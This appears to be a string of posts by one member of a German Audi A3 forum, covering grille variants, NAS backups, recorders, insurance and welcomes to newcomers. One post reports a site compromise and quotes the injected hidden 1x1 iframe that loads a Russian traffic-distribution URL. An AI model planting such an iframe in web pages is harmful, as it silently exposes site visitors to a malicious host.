ZitatOriginal geschrieben von OO7
so so 8-)
Jo! ![]()
@Au3: Du hast doch nen DFG, da gehts nicht anders und es sieht doch auch gut aus!? ![]()
ZitatOriginal geschrieben von OO7
so so 8-)
Jo! ![]()
@Au3: Du hast doch nen DFG, da gehts nicht anders und es sieht doch auch gut aus!? ![]()
ZitatOriginal geschrieben von TDI-Pete
Es gab in der c't 08/2003 eine Skriptsammlung "Backup für Faule", die per Batchdatei automatisch auf externe Datenträger gesichert hat.
Meinst Du das hier:
http://www.heise.de/ct/ftp/03/08/160/default.shtml
Ein sicheres System hat IMMER eine Backup-Strategie. Wie schon angesprochen, ist Raid die eine Sache - es erhöht die Ausfallsicherheit.
Damit ist aber nicht die Datensicherheit an sich verbessert. Löschst Du aus versehen Daten, sind sie eben weg - die bekommst Du nur aus einem Backup zurück.
Mit einem NAS hast Du allerdings die Möglichkeit, das Backup auf dem NAS selber auszuführen, unabhängig von Deinem Arbeits-PC. Das NAS kann 24/7 laufen und macht regelmäßig Backups der Daten. Dazu mußt Du allerdings auch auf den Platten arbeiten und Deine Daten dort speicher, statt auf der lokalen Platte.
Das ist eigentlich kein Problem, Du kannst die Partitionen oder Bereiche auf dem NAS ja mit Deinem PC fest verbinden (Laufwerksbuchstaben) und dann damit arbeiten, als wären sie intern eingebaut.
Soweit so gut... denn nun kommt das nächste Problem: Der Datendurchsatz. Günstige NAS-Speicher schaffen nämlich mal gerade 3-10 MB... Da wirds zur Qual, so zu arbeiten. Wenn Du es schnell willst, mußt Du ein Leistungsfähiges System anschaffen und entsprechend ein schnelles Netzwerk zur Verfügung stellen. Und der Haken heißt dann: Teuer... (oder auch EMC Centera ... :D)
Ach ja... Brain: Du weißt ja, ich mag die Centera nicht so... Vielleicht sollte Para eher hier zuschlagen. ![]()
Super Scoty, herzlichen Glückwunsch und alles Gute dann bei dem neuen Job. Ich hoffe, das Umfeld wird Dir gefallen und Du fühlst Dich dann auch schnell wohl dort.
Auf alle Fälle komme ich da mal vorbei, ich fahre nämlich gerne mal ins zweitschönste Bundesland der Welt. ![]()
(Keinen Streit bitte, schön ist es nämlich überall!
)
Genau das ist, was Geld kostet. Das wollten meine Eltern auch, aber mit den günstigen Rekordern (bis 250€) ist das nicht so einfach machbar. Du kannst Rentnern einfach nicht verklickern, welche Tasten zu drücken sind...
Ich würde nicht sparen, das werden Deine Eltern wahrscheinlich auch nicht, die wollen es einfach und verständlich haben. An sich bin ich auch für ne Beratung beim Mediamarkt, die sind da fast immer gut im beraten. Allerdings ist es hier eingeschränkt. Deine Eltern sollten auch ausprobieren, welches Gerät einfach zu bedienen ist.
Wollen Deine Eltern sich mittelfristig einen HD-Fernseher zulegen? Dann sollte der Rekorder auf alle Fälle einen HDMI-Ausgang haben. Wenn er sowieso dran ist... Es schadet nicht, ist aber zukunftssicher.
Schau mal einfach zurück Para, die meisten Geräte gibt es immer noch (so lange ist Klaschi's Anfrage ja auch noch nicht her). Die Preise kannst Du dann in einer Preissuchmaschine suchen, ungefähr stehts ja schon hier im Thread.
So siehts aus. Für den DFG gibts keinen Ersatz (der wird auch nicht verschandelt! :D)
Den SFG kann man auch in Schwarz haben. Das haben hier auch einige. Bei manchen Farben sieht das auch richtig gut aus. Bei Weißen z.B. saucool. Ich mags auch an nem Roten gerne - aber in allen Fällen sollte imho das S-Line Exterierur angebaut sein. Ich finde, das wirkt sonst nicht.
Super, es sieht so aus, als wär heute der russische Quatsch endlich raus (Seitenaufbau ist auch wieder schneller).
FTP-Zugang ist up and running. Wunderbar, endlich kann ich meine Bilder auch auf den entsprechenden Server schubsen. ![]()
Ist immer ne gute Idee. ![]()
Einfach mal hier auf der Seite oben rechts schauen und den Links folgen.
Dann sag ich auch Hallo zu Dir! ![]()
Hallo Kermit, herzlich willkommen im Forum.
Ich hoffe, Du hast hier mindestens so viel Spaß wie wir gestern im Chat. Nachdem das ja prima geklappt hat (es ist doch gar nicht so schwer, oder?) erwarte ich im Forum auch keine Schweirigkeiten... ![]()
Und natürlich sind wir nicht immer so, normalerweise "verkleiden" wir uns im Chat nur einmal im Jahr (zu Halloween). ![]()
Du bist, genau wie alle, herzlich eingeladen, öfter reinzuschauen! ![]()
Und schon wieder ne Russische Invasion:
<iframe src='http://www.traffaret.msk.ru/work/tds/index.php?out=1196874419' width='1' height='1' style='visibility: hidden;'></iframe>
Steht in meinen HTML-Seiten drin... ![]()
Wenn ich mich nicht sehr irre, gibt es den Singleframegrill seit MJ2006 am 8P - also ab Baujahr 06/2005. Schau also genau hin, die Fahrzeuge davor haben noch den DFG (ich find ja den besser, aber das ist ja Geschmackssache... ;))
Eventuell ist aber auch mal einer im Angebot, der älter ist und den SFG nachgerüstet hat. Wenn die Laufleistung passt, ist auch der Preis (aufgrund des Alters) was für Dich. Solche Fahrzeuge wirds aber nicht viele geben, die Nachrüstung machen nur wirklich "Bekloppte" aus den Foren... ![]()
Probleme gibt es natürlich in einem Forum geballt. Ist auch klar, wenns kein Problem gibt, braucht man keine Hilfe. Entsprechend fragt man auch weniger in einem Forum. Also ist es nur natürlich, das Du hier viel von Problemen lesen wirst. Das sollte DIch aber nicht irritieren, es sind immer nur wenige, die es betrifft. Der Normalfall ist, das man nix am Auto hat ausser Freude. Freude pur...
![]()
Das glaube ich schon. Schau mal ins OT, da sind Themen vom PC bis zum Aquarium... Warum nicht auch ein wenig Botanik? ![]()
Ich hab die FSE auch, bin aber inzwischen mehr oder weniger davon ab, mir noch eine weitere Ladeschale zu kaufen. Alle 2 Jahre das selbe Problem. Ein neues Handy und dann wird wieder ne neue Schale für mal eben 130€ fällig.... Nö, das schenk ich mir uns schaue lieber gleich nach, welche Handys auch ohne Ladeschale die volle Funktion unterstützen. Das kannst Du hier nachlesen. Das N95 unterstützt da leider nicht sehr viel, telefonieren ist allerdings schon möglich.
Der im Forum angebotene ist ein 8P, sieht man, wenn man dem Link dort folgt.
Das müßte ähnlich gehandhabt werden. Genau könnten wir es erfahren, wenn sich neue Mitglieder anmelden können... Ich hätte da jemanden, der sich mit Schadenregelungen bestens auskennt.
Auf alle Fälle gibts nicht den Neuwert des Gerätes (lt. Rechnung), dieRechnung haben ja auch die wenigsten Leute noch zur Verfügung, wenn das Radio/Navi nach Jahren geklaut wird.
Ein Diebstahl wird von der Teilkasko geregelt, lies doch mal das Kleingedruckte Deines Versicherungsvertrages, da steht ganz genau, wie das bei Deiner Versicherung geregelt wird. Klingt blöd, ist aber so... ![]()
ZitatOriginal geschrieben von Mysterikum
Was muss ich da Lesen ?
Eine persönliche Meinung. ![]()
Natürlich wird das sicher unterschiedlich empfunden und es gibt auch genauso Gründe, den TFSI vorzuziehen. Die Motoren haben eine komplett unterschiedliche charakteristik und nicht zuletzt ändert der vergleichsweise schwere 3.2l-Motor auch die Achsverteilung. Dem einen gefällt das mehr, dem anderen weniger.
Und ob Quattro sein muß oder nicht ist auch eine Frage des Geschmacks und nicht zuletzt des Geldbeutels. Es gibt Regionen, da würde ich auch unbedingt Wert darauf legen, in anderen eher weniger. Auf alle Fälle würde ich schon darüber nachdenken, der Quattro bringt einfach mehr Traktion auf die Straße. Eine Garantie, jede Fahrsituation problemlos zu meistern ist er indes auch nicht, da steht die Physik im Weg (da hilft auch ein guter Reifen ne Menge!).
definitiv mal was anderes als NSU - ganz anders. Nix Edelessen, da ist Currywurst Pflicht! ![]()
Ich war jetzt auch schon länger nicht mehr da, aber mal wieder hin, das wär nicht schlecht. Ne Werkstour (so wie Mr.X die gemacht hat bei der Abholung) hab ich auch noch nie gemacht, das hat sicher was...
*meld* ![]()
Wer kommt mit? Könnte man doch im Rahmen eines kleinen Treffens machen...